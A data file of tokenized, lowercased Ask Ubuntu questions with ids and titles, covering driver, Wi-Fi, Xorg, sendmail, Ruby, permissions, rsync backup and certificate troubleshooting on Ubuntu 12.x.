261910	mga g200e on ubuntu server 12.10	i 'm trying to set up correct display resolution but the driver does n't seem to work . r00ster @ nix : ~ $ sudo lshw -c display [ sudo ] password for r00ster : *-display unclaimed description : vga compatible controller product : mga g200e [ pilot ] serverengines ( sep1 ) vendor : matrox electronics systems ltd. physical id : 0 bus info : pci @ 0000:09:00.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : ea000000-eaffffff memory : d0810000-d0813fff memory : d0000000-d07fffff memory : d0800000-d080ffff i 've installed xserver-xorg-video-mga but current driver seems to be : driver gallium 0.4 on llvmpipe ( llvm 0x301 ) experience fallback screen is detected as laptop and maximum resolution is 1280x1024 . how to fix that ? edit : here is my xorg.0.log and here is my xorg.conf
261913	how to set-up ( very ) simple sendmail	i 've been trying to get command line sendmail to work , but no success . i need this to output my anacron error somewhere . i 've installed the sendmail package . configured /etc/aliases with : root : me @ gmail.com but whenever i 'm trying to send an email to any address ( root , me @ gmail.com ) the sendmail log keeps telling me its relayed to 'localhost ' and sent . never to be found again . some files get made in /var/mail/mqueue . log output : root @ tok : /var/mail # sendmail me @ gmail.com test37 feb 27 13:35:40 tok sendmail [ 23616 ] : r1rczanw023616 : from=tys , size=7 , class=0 , nrcpts=1 , msgid= < 201302271235.r1rczanw023616 @ tok.mydomain.nl > , relay=root @ localhost feb 27 13:35:40 tok sm-mta [ 23617 ] : r1rcze41023617 : from= < tys @ tok.mydomain.nl > , size=289 , class=0 , nrcpts=1 , msgid= < 201302271235.r1rczanw023616 @ tok.mydomain.nl > , proto=esmtp , daemon=mta-v4 , relay=localhost [ 127.0.0.1 ] feb 27 13:35:40 tok sendmail [ 23616 ] : r1rczanw023616 : to=me @ gmail.com , ctladdr=tys ( 1000/1000 ) , delay=00:00:04 , xdelay=00:00:00 , mailer=relay , pri=30007 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( r1rcze41023617 message accepted for delivery ) why does it decide that me @ gmail.com should be delivered to localhost and does it never try to actually connect to gmail.com ? how should i configure this ? i rather do n't have any mailserver running at all . i just want the sendmail command to work and to forward my local root mails to mail address . ca n't sendmail just lookup the mx record for the rcpt domain on itself and just deliver it there ? i 've also tried putting the alias in /root/.forward , tried forwarding to local file . all without success . i 've ran newaliases after editing /etc/aliases . i 've tried restarting init.d/sendmail .
261914	install ruby 2.0 with openssl and readline support	i have a fresh ubuntu 12.04 vm , and i would like to install ruby 2.0.0-p0 . i am able to get ruby installed easily enough , but i am unable to get gems to work . $ gem install bundler error : loading command : install ( loaderror ) can not load such file -- openssl error : while executing gem ... ( nomethoderror ) undefined method `invoke_with_build_args ' for nil : nilclass i have open ssl installed , so i 'm not exactly sure what the problem is . $ sudo apt-get install libssl1.0.0 libssl-dev reading package lists ... done building dependency tree reading state information ... done libssl-dev is already the newest version . libssl1.0.0 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . similarly , $ which openssl /usr/bin/openssl if i go back to the installation , there are two lines that concern me . $ sudo make install failed to configure openssl . it will not be installed . failed to configure readline . it will not be installed . thanks !
261916	how to delete `` blank links '' / '' dead links '' from dash search ?	after removing the old version of netbeans and installing the new version , i 've being getting the problem . looks like the netbeans uninstaller removed everything related with it , except the link/shortcut , and now after i 've installed the new version i always get two results in the dash when i look for netbeans ( it also happens when i 'm looking for it with the applications lens ) . so , i 'd like to know how to remove the `` blank link '' ( that takes me nowhere when i click it ) . here is a printscreen/screenshot of the problem : ( just click on it for the full resolution version ) thanks .
261917	apport support for non ubuntu packages	i have been reading about apport and its usage for a week by now . but could not understand the below things . scenario : i have developed an application and packaged it . and its name is myapp.deb . the binary package name is myapp .the application is installed in the path /opt/myapplication/bin/myapp . requirement : when my application crashes , i want to be able to collect core dump . on each subsequent crash , it has to create a new crash , but not overwriting the existing one . something like auto renaming with the current time stamp , etc would help me . when i install my application on a customer machine , my installer must not modify his system wide parameters . say for example , i must not change the pattern of his core file generation , because the user/customer might hate my application as i would change his system parameters without his consent . i am ok with the path of core file generation . either current directory or /var/crash things that i have explored till now : apport is a nice utility which enables core file generations . using /proc/sys/kernel/core_pattern i can format core files . this provides flexibility to redirect the core files to a predefined directory , name core files with pid , file path pattern appended or prep-ended to it , etc.. for non ubuntu packages , i have to write hooks to generate core dumps ( reports ) . apport after collecting the report it will upload . things that i do not understand : is apport the one i must be looking at ? ? i mean does it suffice my purpose ? or should i be looking at something else ? what kind of package does my application fall under ? do i call it non-ubuntu ? 3rd part ? what is it ? i see different terminologies in documents ? as i mentioned , myapp runs from /opt/myapplication/bin/myapp , so where will the core files be generated ? current dir or /var/crash ? does apport detect crashes trigerred from /opt ? does it interpret it ? important question : if i have developed the application and if apport uploads the report to ubuntu repositories , it does not make sense . so how can i tell apport to send the report to me . i get this error : executable does not belong to a package , ignoring . so what am i doing wrong ? for apport to recognise my package , do i need to make it a source package ? is it mandatory ? i just want to create a binary package ? i also saw somewhere in the documents that apport recognises : ubuntu packages or launchpad applications but my application is neither of these . so how does apport help me in the current scenario ?
261919	using unity with i3-wm	is it possible to use the unity panel ( with or without launcher ) with i3-wm instead of compiz ? and if that 's not possible , could i somehow use the hud inside the i3 session ?
261920	what package is responsible for modem ( not ) working and how do i downgrade it after a broken update ?	suddenly my usb mobile broadband modem has stopped working and is completely unable to connect . i have done nothing , so it 's surely some recent update of some network/modem related package ( probably modemmanager or network-manager or god knows ) that is completely broken and shamefully has been releases without proper testing . what is most properly the package responsible for this ? is it modemmanager , or some modem driver in which case how do i figure out which one ? my modem is a huawei k3565 rev 2 ( 12d1:140c ) . it used to work `` fine '' ( except for the handful of bugs that make one 's life a hell , but i could always connect to the internet ) , now there 's no way to connect . once i have figured out which package it is , how do i `` undo '' recent updates and manually go back to a working version ? no way i wait until they fix this ; it will take ages , and it was working .
261922	no applications list in kmenu	since last update i ca n't find any application in applications tab in kmenu applications launcher and also no applications in open with context menu . is there a way to say ( k ) ubuntu to recreate/build applications list ? any help is appreciated . thank you ! update : executing kde utility kbuildsycoca4 solved the problem for me . thank you user26687 !
261924	share directory between users	i am trying to share a directory between two users . the directory is at /reports . i have created a group ( addgroup reports ) , changed the group of the directory , changed the permissions of /reports to allow full access to groups and added the two users to that groups by the following : mkdir /reports addgroup reports chgrp -r reports /reports chmod -r 770 /reports usermod -a -g reports user1 usermod -a -g reports user2 as user1 , running the following , i get a permission denied error . touch /reports/foo.txt running groups user1 does not show reports group , but the mapping is there in /etc/group but i still get a permission denied error .
261925	no apt-get functions working , have tried almost all fixes but none work ?	i got the classic requires installation of unsupported packages . i was told to fix this with sudo apt-get update & & sudo apt-get upgrade so i copy/pasted into the terminal , and it worked as normal . then my cat walked on alt+f4 ( kde4 ) and closed the window roughly 75 % through the upgrade . i can no longer install non-tarball packages . i do n't even have alien .
261931	installation of webapps google+ and grooveshark	i 'm using ubuntu 12.10 and i 'm having trouble installing some webapps ( especially google+ and grooveshark ) . the firefox is in its most recent version and offers no option to install them . thank you for your attention and help .
261937	what is truecrypt ?	i hear people in ask ubuntu talk about software called true crypt . i know it is used to for encryption but i do not know more . how does it encrypt data ? is it available for ubuntu how can i use it ?
261946	how to create encrypt mount entry in /etc/mtab	i am practicing encryption from our community link : folderencryption but while doing fuserunmount command i am getting the following error.i am sure about the process . i have done as they did suggest me but i am getting this and this was n't noticed there . fusermount -u ~/visible & my try information is frank @ august : ~ $ fusermount -u ~/show fusermount : entry for /home/frank/show not found in /etc/mtab how can i solve this ?
261949	how do i get the wireless working on a dell inspiron 1501 ?	the laptop wo n't recognise any networks . i 'm aware that the wireless card probably does n't work because of the drivers , but i also ca n't connect via the ethernet cable , meaning i ca n't download the drivers . the modem works fine . i 've checked it with my netbook that runs windows 7 . when i plug in the ethernet cable , it brings up 'wired connection 1 ' in the connections , but i ca n't do anything with it . i 've tried entering the isp , gateway etc , but no hope . i ca n't find a solution to this anywhere on the internet . i 've been searching for days . i 'd really appreciate any step by step guidance . edit here 's what terminal brings up when i pop in the following ; **sudo lshw -class network** *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:18 memory : c0200000-c0203fff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : c0300000-c0301fff **lsusb** bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub **lspci** 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rs480 host bridge ( rev 10 ) 00:01.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:05.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:06.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:12.0 sata controller : advanced micro devices [ amd ] nee ati sb600 non-raid-5 sata 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci0 ) 00:13.1 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci1 ) 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci2 ) 00:13.3 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci3 ) 00:13.4 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci4 ) 00:13.5 usb controller : advanced micro devices [ amd ] nee ati sb600 usb controller ( ehci ) 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 13 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb600 ide 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb600 pci to lpc bridge 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs482 [ radeon xpress 200m ] 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 08:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 08:01.0 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 08:01.1 system peripheral : ricoh co ltd r5c843 mmc host controller ( rev 01
261956	how to install bug fixes for nvidia in kernel 3.7.9 ?	i am using kernel 3.7.9 in ubuntu 12.04 . i currently can not build the nvidia packages for bumblebee . there is a bugfix available , but i have no clue how to use it . the instructions are : [ impact ] nvidia and fglrx drivers need to be updated in order to build against linux 3.7 [ test case ] 1 . install the latest upstream kernel as described at https : //wiki.ubuntu.com/kernel/mainlinebuilds 2. confirm that the nvidia and fglrx drivers fail to compile against this kernel , and that rebooting to this kernel gives no binary driver . 3. upgrade to the packages in precise-proposed . 4. confirm that the new version of the package successfully builds the kernel module . the error : building initial module for 3.7.9-030709-generic error ( dkms apport ) : kernel package linux-headers-3.7.9-030709-generic is not supported error ! bad return status for module build on kernel : 3.7.9-030709-generic ( x86_64 ) would it be better to use another kernel version ?
261957	how do i disable the workspace switcher in the cinnamon environment i use with 12.04lts ?	i have ubuntu 12.04 lts with cinnamon de on my laptop . whenever i move the mouse cursor to the top left area of the screen , the workspace switcher comes up to offer multiple workspaces . how do i disable this ? i do n't want this to happen when i move the mouse cursor to the top left area of the screen . i prefer to have only one workspace for my use .
261962	dropped my laptop and ca n't run windows 7 . currently booting ubuntu via a cd	from a bit of personal troubleshooting ( of which i am by no means any form or an expert ! ) by way of ultimate boot cd , i came to the conclusion that part of my hd was damaged when i dropped the laptop resulting in w7 not loading . i initially wanted to simply run ubuntu from the cd to transfer my important documents from the hd to a flash drive , as the utilities on ultimate boot were too complicated for me to understand , and then purchase a new hd . i am now wondering if i was to fully install ubuntu as my os would it simply bypass the booting of windows and i can use my laptop like usual , apart from i will use this os as opposed to windows 7 ( of which i 'm not too fussed about ! ) failing that i understand that my only other option would be to buy a new hd and a new windows os ? i will apologise now if this post is not what is to be expected on here and also if what i have tried to describe is laughable ! as i said , i 'm no expert ! thanks in advance .
261963	xorg : no screens found on startup in 12.04.2 lts	i have an intel ivybridge video card . this morning , my 12.04.02 lts treated me to an xorg server crash . trying an older kernel worked once , but lead to the same error during reboot . the problem does not appear to be related to the kernel . restarting lightdm did get me to a gui login screen : sudo service lightdm stop sudo service lightdm start so now i 'm able to do a little bit of diagnostics . i did a diff of the xorg logs between the first xorg start ( which crashed ) and the second ( which succeeded ) . they look similar , until a certain point . good : [ 310.379 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) [ 310.379 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 310.379 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 310.379 ] ( ++ ) using vt number 7 [ 310.380 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 310.380 ] ( ww ) falling back to old probe method for vesa [ 310.380 ] ( ww ) falling back to old probe method for fbdev [ 310.380 ] ( ii ) loading sub module `` fbdevhw '' [ 310.380 ] ( ii ) loadmodule : `` fbdevhw '' [ 310.380 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 310.380 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 310.380 ] compiled for 1.11.3 , module version = 0.0.2 [ 310.380 ] abi class : x.org video driver , version 11.0 [ 310.380 ] drmopendevice : node name is /dev/dri/card0 [ 310.380 ] drmopendevice : open result is 9 , ( ok ) [ 310.380 ] drmopenbybusid : searching for busid pci:0000:00:02.0 [ 310.380 ] drmopendevice : node name is /dev/dri/card0 [ 310.380 ] drmopendevice : open result is 9 , ( ok ) [ 310.380 ] drmopenbybusid : drmopenminor returns 9 [ 310.380 ] drmopenbybusid : drmgetbusid reports pci:0000:00:02.0 [ 310.380 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section bad : [ 2.986 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) [ 2.986 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 2.986 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 2.986 ] ( ++ ) using vt number 7 [ 2.987 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 2.987 ] ( ww ) falling back to old probe method for vesa [ 2.987 ] ( ww ) falling back to old probe method for fbdev [ 2.987 ] ( ii ) loading sub module `` fbdevhw '' [ 2.987 ] ( ii ) loadmodule : `` fbdevhw '' [ 2.987 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 2.987 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 2.987 ] compiled for 1.11.3 , module version = 0.0.2 [ 2.987 ] abi class : x.org video driver , version 11.0 [ 2.987 ] drmopendevice : node name is /dev/dri/card0 [ 3.151 ] drmopendevice : open result is 9 , ( ok ) [ 3.287 ] drmopenbybusid : searching for busid pci:0000:00:02.0 [ 3.287 ] drmopendevice : node name is /dev/dri/card0 [ 3.287 ] drmopendevice : open result is 9 , ( ok ) [ 3.287 ] drmopenbybusid : drmopenminor returns 9 [ 3.287 ] drmopenbybusid : interface 1.4 failed , trying 1.1 [ 3.287 ] drmopenbybusid : drmgetbusid reports [ 3.287 ] drmopendevice : node name is /dev/dri/card1 [ 3.291 ] drmopenbybusid : drmopenminor returns -1 [ 3.291 ] drmopendevice : node name is /dev/dri/card2 [ 3.295 ] drmopenbybusid : drmopenminor returns -1 [ 3.295 ] drmopendevice : node name is /dev/dri/card3 [ 3.299 ] drmopenbybusid : drmopenminor returns -1 [ 3.299 ] drmopendevice : node name is /dev/dri/card4 [ 3.302 ] drmopenbybusid : drmopenminor returns -1 [ 3.302 ] drmopendevice : node name is /dev/dri/card5 [ 3.306 ] drmopenbybusid : drmopenminor returns -1 [ 3.306 ] drmopendevice : node name is /dev/dri/card6 [ 3.310 ] drmopenbybusid : drmopenminor returns -1 [ 3.310 ] drmopendevice : node name is /dev/dri/card7 [ 3.314 ] drmopenbybusid : drmopenminor returns -1 [ 3.314 ] drmopendevice : node name is /dev/dri/card8 [ 3.317 ] drmopenbybusid : drmopenminor returns -1 [ 3.317 ] drmopendevice : node name is /dev/dri/card9 [ 3.321 ] drmopenbybusid : drmopenminor returns -1 [ 3.321 ] drmopendevice : node name is /dev/dri/card10 [ 3.325 ] drmopenbybusid : drmopenminor returns -1 [ 3.325 ] drmopendevice : node name is /dev/dri/card11 [ 3.329 ] drmopenbybusid : drmopenminor returns -1 [ 3.329 ] drmopendevice : node name is /dev/dri/card12 [ 3.332 ] drmopenbybusid : drmopenminor returns -1 [ 3.332 ] drmopendevice : node name is /dev/dri/card13 [ 3.336 ] drmopenbybusid : drmopenminor returns -1 [ 3.336 ] drmopendevice : node name is /dev/dri/card14 [ 3.340 ] drmopenbybusid : drmopenminor returns -1 [ 3.340 ] drmopendevice : node name is /dev/dri/card15 [ 3.344 ] drmopenbybusid : drmopenminor returns -1 [ 3.344 ] drmopendevice : node name is /dev/dri/card0 [ 3.344 ] drmopendevice : open result is 9 , ( ok ) [ 3.404 ] drmopendevice : node name is /dev/dri/card0 [ 3.404 ] drmopendevice : open result is 9 , ( ok ) [ 3.404 ] drmgetbusid returned '' [ 3.404 ] ( ee ) intel ( 0 ) : [ drm ] failed to set drm interface version . [ 3.404 ] ( ee ) intel ( 0 ) : failed to become drm master . [ 3.404 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 3.404 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 3.404 ] ( == ) intel ( 0 ) : rgb weight 888 [ 3.404 ] ( == ) intel ( 0 ) : default visual is truecolor [ 3.404 ] ( ii ) intel ( 0 ) : integrated graphics chipset : intel ( r ) ivybridge desktop ( gt1 ) [ 3.404 ] ( -- ) intel ( 0 ) : chipset : `` ivybridge desktop ( gt1 ) '' [ 3.404 ] ( ii ) unloadmodule : `` intel '' [ 3.404 ] ( ii ) unloading intel [ 3.404 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 3.404 ] fatal server error : [ 3.404 ] no screens found [ 3.404 ] more questions : why is xorg crashing at startup , and why is it able to start normally shortly after ? is this a bug ? if yes , i 'll go file a report . i can post the full logs if anybody is interested .
261966	dell inspiron n4110 heating problem	in my dell inspiron 4110 the cooling fan keeps on all the time and the left side of the laptop is really warm ( it gets up to 100 celsius ) . it is not happening on windows . i tried to install bumblebeed but had no success . when i try to run sudo bumblebeed , i get : [ error ] no discrete video card found , quitting any ideas ?
261967	sd card is not mounted in lubuntu	i have a 2gb transcend sd card for my camera but when i entered it in my laptop 's sd slot then it is not mounted automatically by lubuntu . i did not have the same problem with ubuntu . i can not see it also in the graphical storage device manager . i tried the following workarounds on the bugs mentioned in 1 and 2 but the problem still persists . kernel version : 3.5.0-25-generic ok , i tried dmesg and here are the steps : dmesg output : [ 9219.520160 ] mmc0 : timeout waiting for hardware interrupt . [ 9229.536177 ] mmc0 : timeout waiting for hardware interrupt . [ 9239.552162 ] mmc0 : timeout waiting for hardware interrupt . [ 9243.048896 ] mmc0 : card removed during transfer ! [ 9243.048908 ] mmc0 : resetting controller lspci output : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 05:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 06:04.0 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 06:04.2 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 01 ) 06:04.3 mass storage controller : o2 micro , inc . integrated ms/xd controller ( rev 01 ) 06:05.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) how can i resolve this issue ? i tried it also with linuxmint ( linux version 3.5.0-17-generic ) in my laptop and it still does not work ...
261971	search plugin for wrapping words with text in gedit v3	i 've been searching out for a plugin that could possibly wraps words with specified text . for example i double click this word to highlight it : word and using a particular shortcut , it becomes as : < b > word < /b > or myfunction ( word ) ; or ... whatever depending what user defines . i 'm currently using gedit v3 . it would be really helpful if someone know a place where i can get this type of plugin .
261976	how to get an epson-al-cx11 printer working ?	i have an epson ( al-cx11 ) printer that used to work with linux , but at some point , at a linux kernel version , it stopped working . i can install the printer without errors , but when sending a test page , it does n't print . as if it never receives the printing assignment . question : how can i get my epson-al-cx11 to work with ubuntu .
261977	detecting use of ubuntu unity global menu	i 'm porting a commercial app to linux , it is to run on several distros . when run on ubuntu , the gtkmenubar is removed from the app 's window and placed on the main global menu bar . that 's fine ... but there is a corresponding empty space in the app window where the menu was removed ( it is placed with gtkfixed ) . i need to be able to detect when this has happened ( and only ) when it has happened from any distro , so that i can reliably remove the empty space . what 's the best way to detect this ? ( ie via gtk_widget_ ... calls ) what has been done to the gtkmenubar to achieve this ? thanks .
261978	unable to update jdk 7	i 've installed jdk through the webupd8 ppa ( oracle-java7-installer ) . the problem is that whenever i try to update java , the process just pauses after connecting with oracle 's server . if i force close the terminal , then i ca n't update anything because of the incomplete java update .
261981	use wifi only when necessary	to optimise my laptops battery life i would like to make it so that wifi gets turned on only when there is a process running which needs a network access . for example when browser or transmission is started wifi turns on , but when i close them wifi also gets turned of . something like caffeine does for enabling and disabling screensaver when assigned processes are running .
261984	programming opengl es in ubuntu	i want to program somthing using opengl es , i search software center for anything related and i found libgles1-mesa-dev , then i wrote a simple main program and included : # include < gles/gl.h > # include < gles/glext.h > and it compiles , but if i try to use an opengl es function it says undefined reference . ( meaning the include without using functions compiles , but after writing a function it gives that error ) i compiled using simple gcc ./*.c -o xxx how can i use this library to program opengl es 1.x ? or opengl es in general ?
261985	how do i try ubuntu from a usb stick ?	i wanted to replace windows 7 with ubuntu . is it possible to try ubuntu from usb , like a fully functional ubuntu ? , want to test sound , wifi connectivity etc . is there an option to exit from the above option , in case i dont want to install ubuntu , try it later after fixing something ?
261986	how do i permanently remove my wireless interface ?	how do i remove the device driver for my . description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) [ 168c:1c ] vendor : atheros communications inc. [ 168c ] physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:24 : d2:13:78:86 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.2.0-38-generic-pae firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg
261988	no longer able to use wifi , adapter intel wifi link 5100 , ubuntu 12.04	computer : acer aspire 7730 . only ubuntu installed . hi , i installed ubuntu 12.04 yesterday and wifi worked out of the box . but now the wifi does not work anymore . it was after i did a sudo apt-get update in order to try to fix spotify ( native ) ( could n't start it ) , but i 've since learned that update does not actually update any packages ( correct me if i 'm wrong ) . but if was after the reboot ( ubuntu wanted me to reboot ) that my wifi no longer works . if i type sudo lshw -c network this is the output : *-network unclaimed description : network controller product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:07:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : c0a00000-c0a01fff so my wifi adapter is unclaimed , which i 've read means that no driver is associated with it . also : iwconfig gives lo no wireless extensions . eth0 no wireless extensions . this is the link that i wanted to use to try to install iwlwifi ( i first wanted to try a linux driver instead of the whole windows wireless driver thing . plus when i tried to find the driver for this adapter , i could only find .exe files , while it said that i should find .inf files ) . running this cd /lib/firmware ls *.ucode gives iwlwifi-1000-5.ucode iwlwifi-2030-6.ucode iwlwifi-6000-4.ucode iwlwifi-100-5.ucode iwlwifi-3945-2.ucode iwlwifi-6000g2a-5.ucode iwlwifi-105-6.ucode iwlwifi-4965-2.ucode iwlwifi-6000g2a-6.ucode iwlwifi-135-6.ucode iwlwifi-5000-5.ucode iwlwifi-6000g2b-6.ucode iwlwifi-2000-6.ucode iwlwifi-5150-2.ucode iwlwifi-6050-5.ucode notice the iwlwifi-5000-5.ucode . this looks very similar to the file ( s ) that i downloaded from the previous website that i showed . so since it is already there , i have n't tried to install it to that directory yet ( and i 'm not quite certain how to do it ) . maybe the kernel/system/whatever simply does n't load the driver on boot-up ? most of the problems i 've had with ubuntu so far have been solved with copy pasting terminal commands without knowing what they do , but it feels like the more i do this the more brittle the whole system becomes ( because i do n't know what i 'm doing ) . it seems that installing and updating software can lead to unforeseen , bad side-effects that i do n't have the skill to foresee . so for this problem i want to ask someone directly before i proceed . thanks !
261990	backup to remote win machine	i have to backup my data to a remote machine . the local machine run ubuntu 10.04 and the remote machine run winxp . googling i found several discussion about this argument but none of them helps me to solve this problem . this is what i 've done : 1 ) create a mounting point for the remote folder sudo mkdir /mnt/backup 2 ) mount the remote folder sudo mount -t cifs -o username=xxx , password=xxxx //10.1.1.111/maxquant_linux /mnt/backup 3 ) perform rsync sudo rsync -avz /home/cism/documents/data/ /mnt/backup/ this is the error i obtained : sending incremental file list ./ rsync : failed to set times on `` /mnt/backup/ . `` : permission denied ( 13 ) 2012/ rsync : recv_generator : mkdir `` /mnt/backup/2012 '' failed : permission denied ( 13 ) *** skipping any contents from this failed directory *** 2013/ rsync : recv_generator : mkdir `` /mnt/backup/2013 '' failed : permission denied ( 13 ) *** skipping any contents from this failed directory *** sent 57568 bytes received 304 bytes 38581.33 bytes/sec total size is 36670901857 speedup is 633655.34 rsync error : some files/attrs were not transferred ( see previous errors ) ( code 23 ) at main.c ( 1060 ) [ sender=3.0.7 ] i have tried several rsync options such as -- rsync-path='/usr/bin/rsync' and -- rsync-path= '' sudo rsync '' but i obtain always the same kind of errors . do you have any suggestion ?
261994	checking if .pem certificate is installed	is there a way to check if some certificate is installed or at least list the installed certificates ?
